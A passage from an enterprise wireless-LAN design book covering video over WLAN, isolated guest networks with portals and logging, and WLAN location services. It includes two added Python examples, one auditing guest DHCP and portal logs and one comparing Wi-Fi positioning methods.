available bandwidth. Users can be presented with the choice between a high-bandwidth or low-bandwidth
stream to try to ensure a more consistent video experience.

WLAN Video Implementation Challenges


Many of the considerations that are true for voice are directly applicable to video. Video too is sensitive
to network latency, and appropriate QoS measures should be implemented to construct a more
deterministic network environment. Video, however, is more challenging than voice because it
compounds some of the challenges that are encountered with VoIP.

Quality of Service
Not only is video much more data intensive than voice, but it is also truly continuous in nature. Voice
communications typically have some breaks as people pause between sentences to take a breath. This is
not the case for video. As such, limiting latency and jitter is critical. Use QoS classification, marking,
queuing, and traffic engineering techniques to ensure that video is given preferential treatment over less
time-sensitive information but avoid scenarios in which video could drown out all other communication.
Remain sensitive to the fact that video is usually less mission critical than voice. Make use of a tiered
classification and marking strategy for applications. Assign network control traffic the highest priority.
Follow it with voice, then video, and finally best-effort data traffic. Note that this classification scheme is
highly simplified and that you should use more granular tiers if this better suits your needs.

Broadcast Transmission Medium


Another challenge that you face when porting video applications to WLANs is that all video sessions
automatically become broadcast communications. This is irrespective of whether the sessions were
originally broadcast, multicast, or unicast. The reason is found in the nature of RF communications. As is
the case for any communication, access points broadcast data across the airwaves to all attached
stations. Even though a single station might be tuned into the video stream, all stations receive the
video data. Stations that are not tuned in will disregard the video data. Not only does this force the
clients to perform redundant work, but it also ties up the airwaves.
Conversely, the broadcast nature of WLANs can work to your advantage as well. Because broadcast is a
superset of multicast communication, WLANs are ideally suited for multicast video sessions. To subscribe
to a particular session, clients need only stop disregarding the video data that is broadcast from the
access points. However, there is a particular problem with multicast and WLANs. Because all stations
have to be able to receive the multicast stream, the network has to enter a "lowest common
denominator" mode. For example, if a single station operates at 1 Mbps, even if all others are operating
at 54 Mbps, all multicast traffic will be transmitted at 1 Mbps.
Because video is a data-intensive application, the broadcasting thereof can lead to a significant increase
in medium access contention. Carefully plan the architecture and design of your WLAN if you intend to
support video. Pay considerable attention to bandwidth capacity planning and client-to-access point
ratios. Chapter 5 provides recommended strategies and tactics for tackling this challenge.

Managing User Expectations


A final consideration in enabling video applications on WLANs is setting the correct user expectations.
QoS is not a substitute for bandwidth, and it is also not the saving grace for a multi-access medium such
as WLANs. Video is ultimately best served by dedicated high-bandwidth connections. This is especially
true for videoconferencing applications that tie together audio, video, and web applications.
Videoconferencing is not as forgiving as some other video types and also doesn't offer the ability to
make efficient use of bandwidth. Set the proper expectations with the user. Emphasize that the
capability of the WLAN should not be compared to the current capabilities of the wired network,
especially with regard to multimedia applications.

Guest Networking
Guest networking is a term used to describe the provision of network access to nonemployees where
connectivity is usually limited to Internet access. Guest networks are typically considered and
implemented as logical external networks. They avoid the need for visitors such as customers,
contractors, and external vendors to access your native enterprise network to obtain Internet
connectivity. Conceptually, guest networks are very similar to public hotspots, like those commonly
found in airports, cafes, and hotels. The main difference is that the users of enterprise guest networks
are usually not charged for access.

Note
Although it is not strictly required, guest networks are most commonly wireless in nature.
Guest networks could be implemented as wired networks and integrated into the existing wired
network. However, this is a much more complex endeavor than configuring WLANs to provide
a guest networking service.

The key questions that you need to answer when considering guest networks are
Why should you deploy guest networks?
What components are required for deploying them?
How should you implement guest networks?
The following sections tackle these questions by discussing the business rationale for providing guest
networking capabilities, the components that are required to enable the service, and finally, the main
implementation considerations for deploying WLAN guest networks.

Business Rationale for Enabling Guest Networking


Before deciding to implement guest networks, you should validate the business drivers for providing this
complementary service in your environment. The value proposition of wireless guest networks is not
necessarily the same as the rationale for deploying WLANs in general because it is usually related to one
of the following considerations:
Business agility
Security
Liability protection
The following sections explore each of these considerations in more detail.

Business Agility
Guest networking is made available to nonemployees as an amenity. By ensuring that your visitors can
access the Internet, you improve their experience while at your site. This can be important in industries
that have a high degree of public interaction or in organizations that have many visitors.
A guest portal is often used, so the visitor is greeted with a Web page when they first use the service.
Typically, this will include a welcome page, perhaps a legal disclaimer, and maybe an authorization or
check box for them to acknowledge.
After guests successfully obtain Internet access, they can use their own remote access solution to
connect to their corporate infrastructure. Guests thus effectively extend their organization's intranet to
your site, making their full suite of productivity applications available to them. For example, they can
download their e-mail, browse their internal website, and retrieve voicemail.
A particularly useful application of guest networks can be found in product demonstrations. When a sales
representative visits your office, he can access all applications and information that would be available to
him if he were at his own corporate offices. As such, a full-featured demonstration can be delivered
without being encumbered by the potential unavailability of tools and data.

Security
Many enterprises do not allow nonemployees to access the network. This simple security policy avoids
the risk associated with visitors introducing viruses to the network, snooping, hacking, and other
undesirable activity. However, visitors can benefit from Internet connectivity to gain access to their own
enterprise networks (to check e-mail, access files, and so on). A policy decision to altogether prohibit
access therefore negatively impacts the productivity of your visitors.
A guest networking solution addresses this conflict. You can provide visitors, contractors, and vendors
with access to the Internet while preventing access to your enterprise network. Guest traffic is
separated and tunneled securely across your network to the Internet, thus creating an isolated and
secure environment for your visitors to work in.

Legal Liability Protection


Internet traffic can typically be tracked to its source. Therefore, all Internet traffic that originates from
an enterprise can easily be identified as having come from that enterprise's network. Employees usually
sign an acceptable use policy when hired. They agree not to undertake malicious or illegal behavior, such
as hacking or deliberately spreading viruses. However, guests are not required to sign such employee
agreements.
Protect yourself from legal liability by implementing a portal in which users need to read and explicitly
accept a policy for acceptable use prior to connecting to your wireless guest network. In the unfortunate
case of a crime or unacceptable behavior, you can audit records, identify the offending guest, and take
appropriate action.

Components of Guest Networking


A guest network imposes two distinct requirements:
The guest network must somehow uniquely identify itself. This is achieved in guest WLANs
by using a dedicated Service Set Identifier (SSID).
Guest traffic must be transported to and from the Internet in an isolated and secure
fashion. This is done by using IP tunneling protocols to create virtual conduits between the access
point and the Internet.
A dedicated guest SSID is created on the same access point that services the enterprise WLAN to
produce a separate Layer 2 network. The benefit of adding an additional SSID is that it avoids the need
to purchase, deploy, and support additional access points. The incremental guest WLAN SSID thus
uniquely identifies the virtual WLAN that is dedicated to guest traffic. This not only makes the separation
of guest and production traffic possible, but it also enables the definition of different association and
authentication policies for your guests and regular users.
Configure your guest SSIDs with "OPEN" authentication and no encryption to provide open access in the
same manner as public hotspots. This essentially permits any laptop to associate with the AP.
Furthermore, configure the access points to broadcast the SSID so that the guest SSID can readily be
discovered by any station that wants to attach to the guest network. Figure 4-4 illustrates how a
dedicated guest SSID creates a virtual WLAN that is separate from the WLAN that is identified by the
enterprise SSID.

Figure 4-4. Enterprise and Guest SSIDs on the Same Access Point

Note
Broadcasting the SSID of the enterprise WLAN is discouraged for security reasons: suppressing
the broadcast makes the identification of the SSID more difficult and lowers the risk of accidental
or malicious association.

These steps ensure that all visitors can locate and associate with the SSID, and use the guest
networking service, without having to resort to substantial configuration changes on their laptop. WLAN
client software can be used to select the same public WLAN profile that is applied to access public
hotspots.
The second requirement is to transport all guest traffic in an isolated and secure manner from the access
point to the Internet. Tunneling protocols such as LWAPP, GRE, or IPsec provide an efficient mechanism
for performing this task. The protocols erect virtual conduits between the access point and the Internet
gateway through which all guest traffic must pass.
This is essentially identical to the use of VPN tunnels to provide secure remote access to the enterprise
network across the Internet. The minor difference in the case of guest WLANs is that the tunnels cross
the private intranet rather than the public Internet, as they do for VPN remote access. The principle,
however, is identical. Tunneling traffic isolates it from the rest of the network and provides a secure
path to the destination.
Note that even though guest WLAN traffic traverses the same physical infrastructure as the enterprise
network, it is entirely separated on a logical basis. Although the same access points, switches, and
routers are used to transport data, for all intents and purposes the guest network is a completely
separate network. Figure 4-5 shows the physical configuration of a WLAN that is tunneling guest traffic
onto the Internet. Figure 4-6 shows the corresponding logical configuration of the same network,
highlighting the fact that the guest network appears as a logically separated entity.

Figure 4-5. Physical Topology of Guest Networking Solution

Figure 4-6. Logical Topology of Guest Networking Solution

Guest WLAN capabilities can be provisioned in different ways. Many WLAN vendors provide equipment
with "built in" support for guest networking capabilities. The WLAN gear can be configured to create the
SSID, the tunnels, and even a guest portal. For example, these features are offered in the centralized
WLAN controller-based solution from Cisco Systems.
Alternatively, you can purchase dedicated equipment that is specifically designed to provision guest
services. These network appliances are usually placed in a centralized location in your network and
provide guest networking services to several buildings, often along with additional security capabilities.
Finally, it is possible to engineer a solution using the capabilities of your switches and routers. This last
option is not recommended because it does not scale well and requires significant technical expertise to
implement and maintain correctly.

Guest Networking Implementation Considerations


Several topics should be considered before implementing guest networking. Although this service can
add significant value, it also introduces additional complexity to the WLAN. Some of the issues you
should consider before implementation include the following:
Guest portal
Legal disclaimers and acceptable use policies
Ease of use
Support
Logging and auditing
The next sections describe each of these in greater detail.

Guest Portal
Develop a guest portal to be the public face of your guest network. Make it aesthetically pleasing;
include your corporate identity; and, depending upon your security policy, require the guest user to
record their name, acknowledge a legal disclaimer, or sign an acceptable use policy.

Legal Disclaimers and Acceptable Use Policies


Include a legal disclaimer with your guest network. You should engage independent legal counsel to
ensure that the disclaimer conforms with local legislation and that you are protecting your enterprise
from any legal liability that might accrue from misuse by your guests. Display the acceptable use policy
on the guest portal and require that guests agree to comply with the policy prior to granting access to
the Internet. Having users select an I Accept box or type their name into a Signature field works well for
this purpose.

Ease of Use
Make the guest networking solution easy to use. When providing guests with access to a guest network,
you should not require specific software or configuration changes to their laptops.
Implement the guest networking solution with its own SSID configured with OPEN authentication and no
security settings. Ensure that the SSID is broadcast. Because the guest network is logically isolated from
your enterprise network, and only provides access to the Internet, this should not present any security
concerns. As always, ensure that your Information Security department reviews and approves your design
prior to making it available to visitors.

Support
Minimize the support burden of your guest networking solution. Because the users will primarily be
guests, you do not want to expend operational cycles on supporting them. Keep the system easy to use
and produce some basic guidelines for your guests to lighten the support burden. Frequently Asked
Questions (FAQ) sheets can be produced that tell the guest what SSID to use, how to navigate the guest
portal, and to help with basic connectivity troubleshooting.

Logging and Auditing


Log the activity of your guest users. Your enterprise might already log Internet activity by your own
staff, which should make it easier if you decide to log guests also. At the minimum, keep records of the
number of sessions, the identity and IP address of the guest users, and the time and date of their
session.
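The audit this section and the earlier liability discussion call for, as an added example that is not the book's own code: given constructed guest-portal and DHCP records, it answers which guest held an IP address at a given time, handles an address that was reused by a later lease, and flags a lease for which no acceptable use policy was ever accepted. The log format, field names and the assumption that both records share the client MAC address are mine.

```python
"""Guest WLAN audit: which guest held a given IP address at a given time?

Added example with constructed records; it is not the book's code. It
assumes the guest portal logs one ACCEPT_AUP line per accepted policy
and the guest VLAN's DHCP server logs one LEASE line per lease/renewal,
both keyed by the client MAC address. If guest traffic is NATed, the
NAT translation log must first be resolved to the internal guest IP.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed sample records (format and field names are assumptions).
PORTAL_LOG = """\
2006-05-16T09:02:11Z ACCEPT_AUP mac=00:11:22:aa:bb:01 name="A. Visitor" company="Example Corp"
2006-05-16T09:40:57Z ACCEPT_AUP mac=00:11:22:aa:bb:02 name="B. Contractor" company="Contoso Ltd"
2006-05-16T13:15:03Z ACCEPT_AUP mac=00:11:22:aa:bb:03 name="C. Vendor" company="Fabrikam Inc"
"""
DHCP_LOG = """\
2006-05-16T09:01:50Z LEASE ip=10.200.0.23 mac=00:11:22:aa:bb:01 lease=3600
2006-05-16T09:40:30Z LEASE ip=10.200.0.24 mac=00:11:22:aa:bb:02 lease=3600
2006-05-16T10:01:50Z LEASE ip=10.200.0.23 mac=00:11:22:aa:bb:01 lease=3600
2006-05-16T13:14:40Z LEASE ip=10.200.0.23 mac=00:11:22:aa:bb:03 lease=3600
2006-05-16T14:10:02Z LEASE ip=10.200.0.25 mac=00:11:22:aa:bb:09 lease=3600
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')  # key=value or key="quoted value"


@dataclass
class Lease:
    start: datetime
    end: datetime
    ip: str
    mac: str


@dataclass
class Acceptance:
    when: datetime
    mac: str
    name: str
    company: str


def parse_ts(ts: str) -> datetime:
    """ISO-8601 UTC timestamp with a trailing Z -> timezone-aware datetime."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def parse_line(line: str):
    ts, event, rest = line.split(" ", 2)
    fields = {k: v.strip('"') for k, v in FIELD_RE.findall(rest)}
    return parse_ts(ts), event, fields


def parse_leases(text: str) -> List[Lease]:
    leases = []
    for line in text.splitlines():
        when, event, f = parse_line(line)
        if event == "LEASE":
            end = when + timedelta(seconds=int(f["lease"]))
            leases.append(Lease(when, end, f["ip"], f["mac"].lower()))
    return leases


def parse_acceptances(text: str) -> List[Acceptance]:
    accepts = []
    for line in text.splitlines():
        when, event, f = parse_line(line)
        if event == "ACCEPT_AUP":
            accepts.append(Acceptance(when, f["mac"].lower(), f["name"], f["company"]))
    return accepts


def lease_at(leases: List[Lease], ip: str, when: datetime) -> Optional[Lease]:
    """Lease covering `ip` at `when`; on overlap (a renewal) take the latest start."""
    live = [ls for ls in leases if ls.ip == ip and ls.start <= when < ls.end]
    return max(live, key=lambda ls: ls.start) if live else None


def acceptance_for(accepts: List[Acceptance], mac: str, when: datetime) -> Optional[Acceptance]:
    """Most recent policy acceptance from this MAC at or before `when`."""
    prior = [a for a in accepts if a.mac == mac and a.when <= when]
    return max(prior, key=lambda a: a.when) if prior else None


def identify_guest(ip: str, when_str: str, leases: List[Lease],
                   accepts: List[Acceptance]) -> Dict[str, str]:
    """Resolve an (IP, time) pair from a complaint to a guest identity."""
    when = parse_ts(when_str)
    lease = lease_at(leases, ip, when)
    if lease is None:
        return {"status": "no-lease", "ip": ip}
    acc = acceptance_for(accepts, lease.mac, when)
    if acc is None:
        # Address was in use, but no policy acceptance exists for that MAC:
        # the portal enforcement or its logging needs investigating.
        return {"status": "no-aup", "ip": ip, "mac": lease.mac}
    return {"status": "identified", "ip": ip, "mac": lease.mac, "name": acc.name,
            "company": acc.company, "accepted_at": acc.when.isoformat()}


if __name__ == "__main__":
    leases, accepts = parse_leases(DHCP_LOG), parse_acceptances(PORTAL_LOG)
    for ip, t in [("10.200.0.23", "2006-05-16T14:00:00Z"),
                  ("10.200.0.23", "2006-05-16T10:30:00Z"),
                  ("10.200.0.25", "2006-05-16T14:30:00Z"),
                  ("10.200.0.23", "2006-05-16T12:00:00Z")]:
        print(ip, t, identify_guest(ip, t, leases, accepts))
```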

WLAN Location Services


The term location-based services (LBS) is sometimes used interchangeably with WLAN location services,
but LBS more correctly denotes services that provide the user with information about the physical
location of the client device. Conversely, WLAN location services provide telemetry information on WLAN
devices. This information is used by many applications to provide visibility of mobile devices, asset
location and tracking information, inventory and supply chain management support, presence data,
Emergency 911 (E911) event triggers, and many others.

Note
The term LBS is also used in cellular telephone networks to denote services offered to
subscribers. For example, cellular phone users might receive a Simple Message Service (SMS)
message notifying them of sales or special offers in retail stores nearby. However, in the
context of this chapter, this discussion focuses on LBS and WLAN location services as they
relate to 802.11-based wireless networks only.

With a robust LBS solution, an organization can easily answer questions such as the following:
What do I have?
How much of it do I have?
Where is it?
What is its status?
The following sections demonstrate why the capability to answer the aforementioned questions is
valuable for various industries and provide an overview of technical considerations that need to be made
when deploying LBS capabilities.

Business Rationale for WLAN Location Services


WLAN location services incorporate location information with pertinent content to provide incremental
value to a user. In essence, timely and accurate information on the whereabouts and status of an entity
is used to provide a more relevant service. These services are typically classified into three families, as
follows:
Tracking services. These services provide the location and utilization information to optimize
processes in workforce, asset, and logistics management. For example, tracking services can
reduce duplication and accelerate logistics in inventory management.
Information services. These services use location data to identify which information is most
relevant for a specific position. For example, different maps might be presented to you depending
on your whereabouts. LBS can be integrated into mobile resource management (MRM) solutions
that target mobile workforce productivity.
Safety and security services. These services rely on location information to provide safety and
security enhancements. For example, the whereabouts of children in theme parks can be tracked
by providing them with active wristbands.
The location information can be of significant benefit in multiple industries by enabling otherwise
difficult-to-realize efficiencies. The following sections take a closer look at how various industries are
using these location services.

Healthcare
Hospitals spend millions of dollars on the latest technology to provide the best level of care to their
patients. This often results in the use of very expensive, but mobile, assets, such as electronic and
automated IV pumps, vital signs monitors, and even gurneys. Not only can the loss or misplacement of
these devices create a financial burden for the hospital, but the lack of the device can also prohibit
timely patient care. The ability to track, locate, and recover these mobile assets is, therefore, absolutely
critical for the hospital or health center.
Some hospitals combine WLAN voice with location services. This allows hospital staff to carry
WLAN-based VoIP handsets that include a "panic button" or key-code that, when pressed, will page all
appropriate staff that are located nearby.
In some instances, patients themselves have been provided with location tags. The WLAN can then be
used to locate the patient, and even provide an automatic link to the patient information system. The
synergy of an existing WLAN infrastructure, location services, WLAN voice, and back-end hospital
systems thus enables a faster response time and improved patient care.

Manufacturing
Location services can offer improved business knowledge by automating and simplifying supply chain
management. The ability to identify exactly how many items are in production, where they are located in
the assembly line, and the current rate of manufacture is critical for operations managers who rely on
timely and accurate information to finely tune the production process. Intimate knowledge of the goods
and their whereabouts is, therefore, essential.
Location services can also be used by robotic delivery mechanisms and warehousing vehicles to
automatically store and retrieve equipment, and monitor stock levels in real time. The use of a
WLAN-based solution saves the enterprise from having to deploy a proprietary, nonstandard RFID
solution instead.

Entertainment and Leisure

Personal security for customers is very important in the entertainment and leisure industries. In Europe,
some theme parks have used WLAN location services to provide an online, active, and real-time
positioning solution for visitors to track the location of children. Children are provided with active location
tags embedded in wristbands or name badges. This provides additional safeguards for security staff and
park management, and peace of mind for parents.

Logistics
The most common logistics operation performed with handheld wireless devices is inventory taking.
Almost every large retail chain and distribution center uses some type of wireless network to assist with
the mundane, but necessary, task of counting things.
WLAN location services can provide incremental value in these environments by providing online, active,
and real-time information on asset location. In the car rental business, identifying whether vehicles have
been returned and whether they are in the garage, workshop, or cleaning bay improves the response
time and productivity of the business. The business can improve its operating margins by ensuring quick
turnaround of its vehicles.

Transport and Shipping


Transport and shipping companies are in the business of delivering packages on time. This is
only possible by ensuring that distribution and dispatch centers operate smoothly, accurately, and
expeditiously. Location services assist in this by making sure that pallets and crates can be tracked and
identified accurately. By attaching asset tags to the pallets and crates, the transport and shipping
business can guarantee that the data provided to its back-office system is accurate.

Components of WLAN Location Services


WLAN location services are usually provided by leveraging the existing infrastructure to provide
information on the location of 802.11 client devices. These devices not only include standard wireless
network client devices (laptops, PDAs, WLAN phones, and so on), but also asset or location tags.

Note
WLAN asset or location tags are small devices about the size of a box of matches. They contain
a battery and an 802.11 transmitter that regularly transmits beacons. The beacons are
received by the access points and interpreted by location service applications.

There are three ways location can be calculated, each with increasing accuracy. The options are
identifying the closest access point, using RF triangulation to determine an approximate position, or
making use of RF fingerprinting to pinpoint the exact location. Use the method that gives you the desired
degree of accuracy:

Closest AP. This method is the simplest way to identify location, but it is also the least accurate.
The WLAN location service queries the access points to determine where a particular client is
associated or which AP reports the strongest signal. While this gives general location information,
the accuracy is limited to the size of the radio cell.
RF triangulation. This method is considerably more accurate than the closest AP method. In this
scheme, signal strength readings are reported from the access points that detect the location tag
or client device. This allows the WLAN location service to calculate the general area using
triangulation algorithms. RF triangulation does not take into account environmental factors, such as
interference, multipath, and signal attenuation. As such, RF triangulation results can be rendered
inaccurate due to these adverse environmental effects.
RF fingerprinting. This method uses a record of the radio signature of the entire area that is
monitored. Effectively, the "fingerprint" of each location (usually on a grid basis) is compared to
real-world data transmitted by the tag. By comparing both, the WLAN location system can quite
accurately determine the tag or client's location. For example, RF fingerprinting can incorporate a
building map that includes the known propagation effects of the building topography such as
attenuation from walls or furniture. Knowing these propagation effects, the WLAN location system
can more accurately determine the tag or client's location.
Location services are computationally intensive, especially when real-time information is required, and
the load grows with every additional device that is tracked. Although many WLAN vendors offer location
services, the more robust and scalable enterprise solutions rely on dedicated servers or appliances to
offload the CPU-intensive activity from the access points or WLAN controllers.
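The three methods above differ in what they know about the building, and that difference is easiest to see in code. The following example is added here and is not from the book or any vendor's product. It assumes a log-distance path-loss model (RSSI falls by 10·N·log10(d) dB, N = 3 indoors), four APs at the corners of a 20 m square, one interior wall that costs 8 dB, and a tag at (14, 6); all of those values, the small per-AP noise, and the 2 m survey grid are constructed for the example. Closest AP returns a cell, triangulation inverts the path-loss model and is thrown off by the wall it does not know about, and fingerprinting matches the readings against a surveyed grid that already contains the wall's effect.

```python
import math

# Constructed floor plan (not from the book): four APs at the corners of a
# 20 m x 20 m area and an interior wall along x = 10 m.
APS = {"ap1": (0.0, 0.0), "ap2": (20.0, 0.0), "ap3": (0.0, 20.0), "ap4": (20.0, 20.0)}
WALL_X = 10.0        # wall position (m)
WALL_LOSS_DB = 8.0   # assumed attenuation for a signal crossing the wall

# Assumed log-distance path-loss model: rssi(d) = RSSI_1M - 10 * N * log10(d)
RSSI_1M = -40.0      # dBm at 1 m from an AP
N = 3.0              # path-loss exponent (indoor office)

TRUE_POS = (14.0, 6.0)   # where the tag really is (east of the wall)
# Small per-AP measurement noise, in dB, added to the constructed readings.
NOISE = {"ap1": 0.3, "ap2": -0.2, "ap3": 0.4, "ap4": -0.3}


def model_rssi(ap_xy, point, walls=True):
    """RSSI an AP would report for a tag at `point` under the path-loss model."""
    d = max(1.0, math.dist(ap_xy, point))
    rssi = RSSI_1M - 10 * N * math.log10(d)
    if walls and (ap_xy[0] - WALL_X) * (point[0] - WALL_X) < 0:
        rssi -= WALL_LOSS_DB          # AP and tag are on opposite sides of the wall
    return rssi


def observed_readings(walls=True, noise=True):
    """Constructed per-AP RSSI readings for the tag at TRUE_POS."""
    return {name: model_rssi(xy, TRUE_POS, walls) + (NOISE[name] if noise else 0.0)
            for name, xy in APS.items()}


def closest_ap(readings):
    """Method 1: the AP reporting the strongest signal. Accuracy = one cell."""
    return max(readings, key=readings.get)


def rssi_to_distance(rssi):
    """Invert the path-loss model; walls are (wrongly) assumed absent."""
    return 10 ** ((RSSI_1M - rssi) / (10 * N))


def triangulate(readings):
    """Method 2: least-squares position from the distances implied by RSSI.

    Each circle |p - ap_i|^2 = d_i^2 is subtracted from the first one, giving
    linear equations a*x + b*y = c, which are solved via the normal equations.
    """
    names = list(readings)
    pts = [APS[n] for n in names]
    dist = [rssi_to_distance(readings[n]) for n in names]
    (x0, y0), d0 = pts[0], dist[0]
    rows = []
    for (xi, yi), di in zip(pts[1:], dist[1:]):
        a, b = 2 * (x0 - xi), 2 * (y0 - yi)
        c = di ** 2 - d0 ** 2 - xi ** 2 - yi ** 2 + x0 ** 2 + y0 ** 2
        rows.append((a, b, c))
    saa = sum(a * a for a, _, _ in rows)
    sab = sum(a * b for a, b, _ in rows)
    sbb = sum(b * b for _, b, _ in rows)
    sac = sum(a * c for a, _, c in rows)
    sbc = sum(b * c for _, b, c in rows)
    det = saa * sbb - sab * sab
    return ((sbb * sac - sab * sbc) / det, (saa * sbc - sab * sac) / det)


def build_fingerprint_db(spacing=2.0, size=20.0):
    """Method 3 setup: the surveyed RSSI vector at every grid point.

    A real site survey measures these; here they are generated from the model
    including the wall, which is exactly the propagation knowledge that
    triangulation lacks.
    """
    steps = int(size / spacing) + 1
    return {(i * spacing, j * spacing): {n: model_rssi(xy, (i * spacing, j * spacing))
                                         for n, xy in APS.items()}
            for i in range(steps) for j in range(steps)}


def fingerprint(readings, db):
    """Method 3: the grid point whose stored RSSI vector is nearest (Euclidean, in dB)."""
    def rssi_distance(fp):
        return math.sqrt(sum((fp[n] - readings[n]) ** 2 for n in readings))
    return min(db, key=lambda p: rssi_distance(db[p]))


def position_error(estimate):
    return math.dist(estimate, TRUE_POS)


if __name__ == "__main__":
    r = observed_readings()
    print("closest AP    :", closest_ap(r))
    print("triangulation :", triangulate(r), "error (m):", round(position_error(triangulate(r)), 1))
    print("fingerprinting:", fingerprint(r, build_fingerprint_db()))
```

Running the block shows the tradeoff the text describes: without the wall, triangulation recovers the position almost exactly, but with the wall in place the two APs on the far side look much farther away than they are and the estimate lands well outside the true cell, while the fingerprint match still returns the correct grid point. A production system typically averages the k nearest fingerprints and weights them by signal distance rather than taking the single nearest point as done here.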

WLAN Location Services Implementation Considerations


In addition to the type of location service you want to provide and how you want to support and
integrate it, you need to carefully consider privacy matters, tag battery life, and tag security when
implementing WLAN location services in your organization.
Privacy is a concern when tracking the location and historical movement of users. Inform the user when
utilizing WLAN location services in the enterprise to track wireless client devices such as laptops, user ID
tags, or WLAN phones.
Tag battery life for WLAN-based asset or location tags ranges from three to five years. Although this
might sound like a sufficient amount of time for most business applications, some thought should be put
into scalability and longevity of the system. The more accurate the real-time information you need, the
more often the tag must transmit its location. (This is a configurable option on most tags.) The more
often a tag transmits its location, the quicker it exhausts its battery. A careful compromise is thus
required. Ensure that you fine-tune the system to collect location information on a sufficiently regular
basis, without expending more battery life than necessary.
Tag security should be considered. When tags are used to track the location of valuable assets, it is
important that they are securely fixed and, if possible, hidden from view. Also make sure that the tag
can be removed when required.

Summary
In this chapter, you learned that supplementary services of voice and video can be layered onto WLANs.
Many of the benefits that these applications bring to wired environments are directly applicable in the
wireless environment. However, carefully consider the challenges of enabling VoIP and video on WLANs
and leverage QoS techniques to remedy some of the problems.
You learned about the implications of having to support voice on a diverse set of WLAN devices and
identified the importance of having a robust architecture and design. If your WLAN deployment contains
multiple ESSs, remain sensitive to the hurdles created by roaming clients. Chapter 5 covers these topics
in greater detail.
This chapter also covered the commonly encountered types of video traffic as well as the challenges that
are specific to implementing video in WLAN environments. You learned about the different distribution
mechanisms, timing of the distribution, and the ability to tune quality to deliver more consistent video
experiences. Keep in mind that a robust QoS foundation is critical but that it also does not resolve all
challenges imposed by multi-access media such as WLANs. Set the proper expectations with your users.
Guest WLANs and location services were the complementary services that this chapter introduced. Guest
WLANs support network access to nonemployees by providing basic Internet connectivity to them. Use
dedicated guest SSIDs as well as IP tunneling protocols to move traffic to and from the Internet in an
isolated and secure manner.
Finally, WLAN location services were introduced as a practical method for providing telemetry
information on WLAN client devices. The value of LBS-enabled tracking, information, and security and
safety services was discussed, and examples were provided of how various industries make use of this
solution.
The proper mix and implementation of these supplementary and complementary services will extend the
success and value of your WLAN for your company. Part II of the book focuses on the specifics of how to
architect and design an enterprise class wireless LAN, what the recommended practices are for
deploying and managing it, and how to construct and implement a security framework for the WLAN.

Additional Resources
Cisco Systems, Inc. "IP Videoconferencing Solution Reference Network Design (SRND)."
http://www.cisco.com/application/pdf/en/us/guest/netsol/ns280/c649/ccmigration_09186a00800d67f6.pdf
. 2002.

Cisco Systems, Inc. "Cisco Gigabit-Ethernet Optimized IPTV/Video over Broadband Solution Design and Implemen
http://www.cisco.com/en/US/partner/netsol/ns340/ns394/ns158/ns88/networking_solutions_design_guide_book0
. 2005. (Requires Cisco.com registration.)
Davidson, Jonathan, J. Peters, and B. Gracely. Voice over IP Fundamentals . Cisco Press 2000.
Durkin, James F. Voice-Enabling the Data Network . Cisco Press 2002.
Hattingh, Christina, and T. Szigeti. End-to-End QoS Network Design: Quality of Service in LANs, WANs,
and VPNs . Cisco Press 2004.

Chapter 5. Guidelines for a Successful Architecture and Design

Part I of this book introduced WLAN technology and familiarized you with its key technical aspects. You
learned about the different types of business considerations you need to make to identify, qualify, and
quantify the value that WLANs can bring to your organization. You also learned about recommended
strategies and practices when initiating the PPDIOO lifecycle of your WLAN. Planning and preparation
focused on providing a structured approach for your deployment and highlighted areas that require
preparatory work because you need to identify management and technical dependencies that are unique
to your circumstances.
As you move through the various lifecycle stages, your focus shifts from strategic to tactical matters.
Chapter 2, "Business Considerations," and Chapter 3, "Preparation and Planning," focus on the strategic
aspects of setting up your WLAN. Part II of the book covers the next phases of the PPDIOO lifecycle. You
learn about architecture, design, implementation, and operations relating to your WLAN.

The difference between architecture and design can be rather vague; however, as a rule of thumb,
consider the difference as similar to that between strategic and tactical matters. In both cases, the
former is concerned with where to go, whereas the latter is focused on how to actually get there. This
chapter covers the strategic aspects of defining your WLAN architecture and takes a look at the tactical
design considerations that are specific to WLANs.
This chapter introduces the notion of architecture and provides recommendations for developing a
holistic framework that can guide the engineering effort of designing, implementing, and operating the
WLAN. You learn about the key components of an effective architecture and identify the balance that
must be struck between detail, complexity, and usefulness.
The WLAN design provides the necessary detail on how the solution must be built, integrated, and
configured. Because many of the design considerations are identical for wired and wireless networks,
this chapter focuses on those considerations that are unique to WLANs. These include the ratio of users
to access points, also known as the client-to-AP ratio, the impact of roaming from cell to cell, and the
physical placement of the access points.
Finally, this chapter highlights the environmental considerations that are essential for defining a WLAN
architecture and design. You learn details about the impact of the physical environment, nearby radio
signals, and local governmental regulations and explore the recommended practices for managing these
challenges.

Architectural Considerations
Architecture is a framework of components, concepts, and practices that acts as a guide for an
underlying design. A robust architecture ensures that the actual WLAN solution meets the predetermined
goal for the organization while providing sufficient flexibility to manage the various engineering and
operational tradeoffs that WLAN technology requires. As such, it is important that the architecture act
only as a guide or baseline and not as a blueprint. This section provides recommendations for setting
realistic expectations and guidelines when defining your WLAN's architecture.

WLAN Expectations
The definition of your WLAN architecture should begin with identifying and scoping your expectations
and goals. A clear understanding of the business needs for WLANs will simplify alignment between
technology solutions and business requirements, and will facilitate the definition of a relevant and
specific WLAN architecture. The successful WLAN architecture, therefore, relies on the business
considerations, as discussed in Chapter 2, and the provisioning strategy, as outlined in Chapter 3.
When you define your WLAN architecture, focus on two distinct technology alignment challenges:
Alignment with business requirements
Alignment with user requirements
To support the business, the WLAN architecture should facilitate and support the generation of a net
positive value in the form of strategic, operational, or technological benefits. To effectively support the
user, the architecture needs to take into account parameters such as usability, convenience, access,
availability, and support. If the WLAN is not easy to use, is subject to poor coverage or uptime, or has
little user support, the total WLAN experience will not be positive, resulting in little or no use of the
infrastructure investment.

Key Components for an Effective WLAN Architecture


WLANs are justified by benefits such as providing mobility to the workforce, reducing the cost of
infrastructure for sporadically used locations, and increasing productivity by keeping mobile users
connected. As highlighted in Chapter 2, the business case for WLANs relies on your ability to identify the
organizational benefits that WLANs can enable. Identifying which services and applications the WLAN
must support is key to building a robust, relevant, and sustainable architecture.
Without a thorough understanding of what is demanded from the wireless communications
infrastructure, there is a high probability that you will either undershoot or overshoot supply. Your WLAN
architecture thus becomes the vehicle that guides and ensures proper alignment between infrastructure
demand and supply. The key components for the step-by-step development of a successful WLAN
architecture are
Determining the goal of the WLAN
